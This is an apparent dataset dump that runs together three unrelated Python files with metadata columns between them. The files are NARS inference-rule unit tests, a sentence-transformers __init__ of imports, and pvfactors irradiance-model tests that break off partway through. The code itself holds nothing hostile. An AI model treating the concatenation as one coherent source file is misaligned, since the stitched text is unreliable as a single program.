self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
def test_contraposition_0(self):
'''
'contraposition
'It is unlikely that if robin is not a type of bird then robin can fly.
<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%
'If robin cannot fly then is robin a type of bird?
<(--,<robin --> [flying]>) ==> <robin --> bird>>?
29
'I guess it is unlikely that if robin cannot fly then robin is a type of bird.
''outputMustContain('<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
561
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%',
'<robin --> bird>.',
'(--,<robin --> bird>).', is_belief_term=True, index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
)
pass
# rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
# '<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%',
# '<(--,<robin --> [flying]>) ==> <robin --> bird>>?',
# '<robin --> [flying]>.', is_belief_term=True, index_task=(1,), index_belief=(0,0))
# tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
# self.assertTrue(
# output_contains(tasks_derived, '<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
# )
# pass
def test_conditional_deduction_compound_eliminate_0(self):
'''
'conditional deduction
'If robin can fly and has wings then robin is a bird.
<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%
'robin can fly.
<robin --> [flying]>. %1.00;0.90%
1
'If robin has wings then robin is a bird
''outputMustContain('<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'<robin --> [flying]>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
)
pass
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
)
pass
def test_conditional_deduction_compound_eliminate_1(self):
'''
'conditional deduction
'If robin can fly, has wings, and chirps, then robin is a bird
<(&&,<robin --> [chirping]>,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%
'robin can fly.
<robin --> [flying]>. %1.00;0.90%
5
'If robin has wings and chirps then robin is a bird.
''outputMustContain('<(&&,<robin --> [chirping]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [chirping]>,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'<robin --> [flying]>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.81%')
)
pass
def test_conditional_deduction_compound_replace_0(self):
'''
'conditional deduction
'If robin is a bird and it's living, then robin is an animal
<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly, then robin is a bird
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
1
'If robin is living and it can fly, then robin is an animal.
''outputMustContain('<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90% ',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90% ',
'<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_conditional_abduction_compound_replace_1(self):
'''
'conditional abduction
'If robin can fly then robin is a bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin both swims and flys then robin is a bird.
<(&&,<robin --> swimmer>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%
7
'I guess robin swims.
''outputMustContain('<robin --> swimmer>. %1.00;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> swimmer>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %1.00;0.45%')
)
pass
def test_conditional_abduction_compound_replace_2(self):
'''
'conditional abduction
'If robin can fly and it has wings, then robin is living.
<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> [living]>>. %0.90;0.90%
'If robin can fly and robin is a bird then robin is living.
<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> [living]>>. %1.00;0.90%
18
'I guess if robin is a bird, then robin has wings.
''outputMustContain('<<robin --> bird> ==> <robin --> [with_wings]>>. %1.00;0.42%')
'I guess if robin has wings, then robin is a bird.
''outputMustContain('<<robin --> [with_wings]> ==> <robin --> bird>>. %0.90;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> [living]>>. %0.90;0.90%',
'<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> [living]>>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> <robin --> [with_wings]>>. %1.00;0.42%')
)
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %0.90;0.45%')
)
pass
def test_conditional_induction_compose(self):
'''
'conditional induction
'If robin can fly and robin chirps, then robin is a bird
<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%
'If robin can fly then usually robin has a beak.
<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%
18
'I guess that if robin chirps and robin has a beak, then robin is a bird.
''outputMustContain('<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%',
'<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
)
pass
if __name__ == '__main__':
test_classes_to_run = [
TEST_NAL5
]
loader = unittest.TestLoader()
suites = []
for test_class in test_classes_to_run:
suite = loader.loadTestsFromTestCase(test_class)
suites.append(suite)
suites = unittest.TestSuite(suites)
runner = unittest.TextTestRunner()
results = runner.run(suites)
| 42.45
| 134
| 0.532347
| 5,567
| 44,997
| 4.164721
| 0.031435
| 0.026914
| 0.020013
| 0.07039
| 0.934829
| 0.916929
| 0.896571
| 0.867457
| 0.84559
| 0.826094
| 0
| 0.052797
| 0.27264
| 44,997
| 1,059
| 135
| 42.490085
| 0.655596
| 0.276307
| 0
| 0.662626
| 0
| 0.137374
| 0.285096
| 0
| 0
| 0
| 0
| 0
| 0.105051
| 1
| 0.062626
| false
| 0.054545
| 0.022222
| 0
| 0.086869
| 0.00202
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6726199fe8a0b57e376df060c4cbd8035df7ee08
| 409
|
py
|
Python
|
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
from .ModularLosses import *
from .MultiplePositivesAndNegativesRankingLoss import *
# from .MeanAveragePrecisionLoss import *
# from .NormalizedDiscountedCumulativeGainLoss import *
# from .NLLAndMAPLoss import *
# from .NLLAndNDCGLoss import *
from .TransposedMultiplePositivesAndNegativesRankingLoss import *
from .BiMultiplePositivesAndNegativesRankingLoss import *
from .BatchAllCrossEntropyLoss import *
| 45.444444
| 65
| 0.850856
| 27
| 409
| 12.888889
| 0.407407
| 0.229885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095355
| 409
| 9
| 66
| 45.444444
| 0.940541
| 0.371638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
67506daafdcff21502f3a895350e711049d0ede5
| 36,200
|
py
|
Python
|
pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 60
|
2018-06-20T03:28:06.000Z
|
2022-03-09T03:34:42.000Z
|
pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 60
|
2018-07-31T03:09:46.000Z
|
2022-03-03T20:02:19.000Z
|
pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 18
|
2018-08-02T00:00:29.000Z
|
2022-02-02T13:47:33.000Z
|
import pytest
from pvfactors.irradiance import IsotropicOrdered, HybridPerezOrdered
from pvfactors.irradiance.base import BaseModel
from pvfactors.geometry.pvarray import OrderedPVArray
from pvfactors.geometry.base import PVSurface
from pvfactors.geometry.pvrow import PVRow
from pvlib.tools import cosd
import numpy as np
import pandas as pd
import datetime as dt
@pytest.fixture(scope='function')
def params_irr():
pvarray_parameters = {
'n_pvrows': 3,
'pvrow_height': 2.5,
'pvrow_width': 2.,
'surface_azimuth': 90., # east oriented modules
'axis_azimuth': 0., # axis of rotation towards North
'surface_tilt': 20.,
'gcr': 0.6,
'solar_zenith': 65.,
'solar_azimuth': 90., # sun located in the east
'rho_ground': 0.2,
'rho_front_pvrow': 0.01,
'rho_back_pvrow': 0.03
}
yield pvarray_parameters
def test_isotropic_model_front(params_irr):
"""Direct shading on front surface"""
# Create and fit irradiance model
DNI = 1000.
DHI = 100.
irr_model = IsotropicOrdered()
irr_model.fit(None, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Expected values
expected_dni_pvrow = DNI * cosd(45)
expected_dni_ground = DNI * cosd(65)
# Check irradiance fitting
np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
expected_dni_ground)
np.testing.assert_almost_equal(irr_model.direct['front_illum_pvrow'][0],
expected_dni_pvrow)
assert irr_model.direct['back_illum_pvrow'][0] == 0.
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
# there should be some direct shading
assert pvarray.ts_pvrows[0].front.shaded_length
# Get modeling vectors
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_ts_modeling_vectors(pvarray)
# Check transform
expected_irradiance_vec = [
0., 0., 0., 0., 0.,
0., 0., 0., 0., 0.,
0., 0., 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 707.10678119, 0.,
0., 0., 707.10678119, 0., 0.,
0., 707.10678119, 0., 0., 0.]
# pvrow
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].front.get_param_weighted('direct'),
expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.illum.get_param_weighted('direct'), expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('direct'), 0.)
# ground
np.testing.assert_almost_equal(
pvarray.ts_ground.illum.get_param_weighted('direct'),
expected_dni_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_array_almost_equal(expected_irradiance_vec,
np.squeeze(irradiance_mat))
# Check invrho_vec
expected_invrho_vec = [
5., 5., 5., 5., 5.,
5., 5., 5., 5., 5.,
5., 5., 5., 5., 5.,
5., 5., 5., 5., 5.,
5., 5., 5., 5., 5.,
5., 5., 5., 100., 100.,
33.33333333, 33.33333333, 100., 100., 33.33333333,
33.33333333, 100., 100., 33.33333333, 33.33333333]
np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
expected_invrho_vec)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
params_irr['rho_front_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
params_irr['rho_back_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('rho'),
params_irr['rho_ground'])
# Check total perez vec
expected_total_perez_vec = [
100., 100., 100., 100., 100.,
100., 100., 100., 100., 100.,
100., 100., 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 807.243186, 100.13640481,
0., 0., 807.243186, 100.13640481, 0.,
0., 807.243186, 100.13640481, 0., 0.]
np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
expected_total_perez_vec)
# check that 2 dimensional
assert np.shape(irradiance_mat) == (40, 1)
# check faoi modifiers
assert irr_model.faoi_back['direct'] == 0.97
assert irr_model.faoi_front['direct'] == 0.99
assert irr_model.faoi_ground == 0.8
# get absorbed sum of sky components
irr_comp_absorbed = irr_model.get_summed_components(pvarray, absorbed=True)
assert np.shape(irr_comp_absorbed) == (40, 1)
# Check a ground surface value
np.testing.assert_allclose(np.array(irr_comp_absorbed)[12, 0],
(1. - params_irr['rho_ground']) *
np.array(irradiance_mat)[12, 0])
def test_isotropic_model_back(params_irr):
"""Direct shading on back surface"""
params_irr.update({'surface_azimuth': 270,
'surface_tilt': 160})
# Apply irradiance model
DNI = 1000.
DHI = 100.
irr_model = IsotropicOrdered()
irr_model.fit(None, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Expected values
expected_dni_pvrow = DNI * cosd(45)
expected_dni_ground = DNI * cosd(65)
# Check fitting
np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
expected_dni_ground)
np.testing.assert_almost_equal(irr_model.direct['back_illum_pvrow'][0],
expected_dni_pvrow)
assert irr_model.direct['front_illum_pvrow'][0] == 0.
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
# there should be some direct shading
assert pvarray.ts_pvrows[0].back.shaded_length
# Get modeling vectors
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_ts_modeling_vectors(pvarray)
# Check
expected_irradiance_mat = [
0., 0., 0., 0.,
0., 0., 0., 0.,
0., 0., 0., 0.,
422.61826174, 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 422.61826174,
422.61826174, 422.61826174, 422.61826174, 422.61826174,
0., 0., 707.10678119, 0.,
0., 0., 707.10678119, 0.,
0., 0., 707.10678119, 0.]
# pvrow
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].back.get_param_weighted('direct'),
expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('direct'), expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('direct'), 0.)
# ground
np.testing.assert_almost_equal(
pvarray.ts_ground
.illum.get_param_weighted('direct'), expected_dni_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_array_almost_equal(expected_irradiance_mat,
np.squeeze(irradiance_mat))
# Check invrho_mat
expected_invrho_mat = [
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333]
np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
expected_invrho_mat)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
params_irr['rho_front_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
params_irr['rho_back_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('rho'),
params_irr['rho_ground'])
# Check total perez vec
expected_total_perez_mat = [
100., 100., 100., 100.,
100., 100., 100., 100.,
100., 100., 100., 100.,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
104.38724754, 104.38724754, 0., 0.,
104.38724754, 104.38724754, 0., 0.,
104.38724754, 104.38724754, 0., 0.]
np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
expected_total_perez_mat)
# Get ts modeling matrices
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_full_ts_modeling_vectors(pvarray)
# check that 2 dimensional
assert irradiance_mat.shape == (41, 1)
def test_hybridperez_ordered_front(params_irr):
# Apply irradiance model
DNI = 1000.
DHI = 100.
ts = dt.datetime(2019, 6, 14, 11)
irr_model = HybridPerezOrdered(horizon_band_angle=6.5)
irr_model.fit(ts, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Expected values
expected_dni_pvrow = DNI * cosd(45)
expected_dni_ground = DNI * cosd(65)
expected_circ_pvrow = 61.542748619313045
# FIXME: it doesn't seem right that circumsolar stronger on ground
expected_circ_ground = 36.782407037017585
expected_hor_pvrow_no_shad = 7.2486377533042452
expected_hor_pvrow_w_shad = 2.1452692285058985
horizon_shading_pct = 70.404518731426592
# Check fitting
np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
expected_dni_ground)
np.testing.assert_almost_equal(irr_model.direct['front_illum_pvrow'][0],
expected_dni_pvrow)
assert irr_model.direct['back_illum_pvrow'][0] == 0.
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
# there should be some direct shading
assert pvarray.ts_pvrows[0].front.shaded_length
# Get modeling vectors
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_ts_modeling_vectors(pvarray)
# Test isotropic_luminance
np.testing.assert_almost_equal(irr_model.isotropic_luminance,
63.21759296)
# Check transform
expected_irradiance_mat = [
0., 0., 0., 0.,
0., 0., 0., 0.,
0., 0., 0., 0.,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
775.89816756, 7.24863775, 7.24863775, 7.24863775,
775.89816756, 7.24863775, 2.14526923, 0.,
775.89816756, 7.24863775, 2.14526923, 0.]
# pvrow direct
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].front.get_param_weighted('direct'),
expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.illum.get_param_weighted('direct'), expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('direct'), 0.)
# pvrow circumsolar
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].front.get_param_weighted('circumsolar'),
expected_circ_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.illum.get_param_weighted('circumsolar'),
expected_circ_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.shaded.get_param_weighted('circumsolar'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('circumsolar'), 0.)
# pvrow horizon
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.illum.get_param_weighted('horizon'),
expected_hor_pvrow_no_shad)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.shaded.get_param_weighted('horizon'),
expected_hor_pvrow_no_shad)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.list_segments[0]
.illum.get_param_weighted('horizon'),
expected_hor_pvrow_no_shad)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('horizon'),
expected_hor_pvrow_w_shad)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('horizon_shd_pct'),
horizon_shading_pct)
# ground
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('horizon'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_ground
.illum.get_param_weighted('direct'), expected_dni_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground
.illum.get_param_weighted('circumsolar'),
expected_circ_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_array_almost_equal(expected_irradiance_mat,
np.squeeze(irradiance_mat))
# Check invrho_mat
expected_invrho_mat = [
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333]
np.testing.assert_array_almost_equal(np.squeeze(invrho_mat),
expected_invrho_mat)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
params_irr['rho_front_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
params_irr['rho_back_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('rho'),
params_irr['rho_ground'])
# Check total perez vec
expected_total_perez_mat = [
63.21759296, 63.21759296, 63.21759296, 63.21759296,
63.21759296, 63.21759296, 63.21759296, 63.21759296,
63.21759296, 63.21759296, 63.21759296, 63.21759296,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
807.243186, 38.59365619, 0., 0.,
807.243186, 38.59365619, 0., 0.,
807.243186, 38.59365619, 0., 0.]
np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
expected_total_perez_mat)
# Get ts modeling matrices
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_full_ts_modeling_vectors(pvarray)
# check that 2 dimensional
assert irradiance_mat.shape == (41, 1)
# check faoi modifiers
assert irr_model.faoi_back['circumsolar'] == 0.97
assert irr_model.faoi_back['horizon'] == 0.97
assert irr_model.faoi_front['direct'] == 0.99
assert irr_model.faoi_ground == 0.8
# get absorbed sum of sky components
irr_comp_absorbed = irr_model.get_summed_components(pvarray, absorbed=True)
assert np.shape(irr_comp_absorbed) == (40, 1)
# Check a ground surface value
np.testing.assert_allclose(np.array(irr_comp_absorbed)[12, 0],
(1. - params_irr['rho_ground']) *
np.array(irradiance_mat)[12, 0])
def test_hybridperez_ordered_back(params_irr):
params_irr.update({'surface_azimuth': 270,
'surface_tilt': 160})
# Apply irradiance model
DNI = 1000.
DHI = 100.
ts = dt.datetime(2019, 6, 14, 11)
irr_model = HybridPerezOrdered(horizon_band_angle=50)
irr_model.fit(ts, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Expected values
expected_dni_pvrow = DNI * cosd(45)
expected_dni_ground = DNI * cosd(65)
expected_circ_pvrow = 61.542748619313045
# FIXME: it doesn't seem right that circumsolar stronger on ground
expected_circ_ground = 36.782407037017585
expected_hor_pvrow_no_shad = 7.2486377533042452
expected_hor_pvrow_w_shad_1 = 6.0760257690033654
expected_hor_pvrow_w_shad_2 = 3.6101632102156898
horizon_shading_pct_1 = 16.176997998918541
horizon_shading_pct_2 = 50.195287265251757
# Check fitting
np.testing.assert_almost_equal(irr_model.direct['ground_illum'][0],
expected_dni_ground)
np.testing.assert_almost_equal(irr_model.direct['back_illum_pvrow'][0],
expected_dni_pvrow)
assert irr_model.direct['front_illum_pvrow'][0] == 0.
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
# there should be some direct shading
assert pvarray.ts_pvrows[0].back.shaded_length
# Get modeling vectors
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_ts_modeling_vectors(pvarray)
# Test isotropic_luminance
np.testing.assert_almost_equal(irr_model.isotropic_luminance,
63.21759296)
# Check transform
expected_irradiance_mat = [
0., 0., 0., 0.,
0., 0., 0., 0.,
0., 0., 0., 0.,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
459.40066878, 459.40066878, 459.40066878, 459.40066878,
7.24863775, 7.24863775, 774.72555557, 3.61016321,
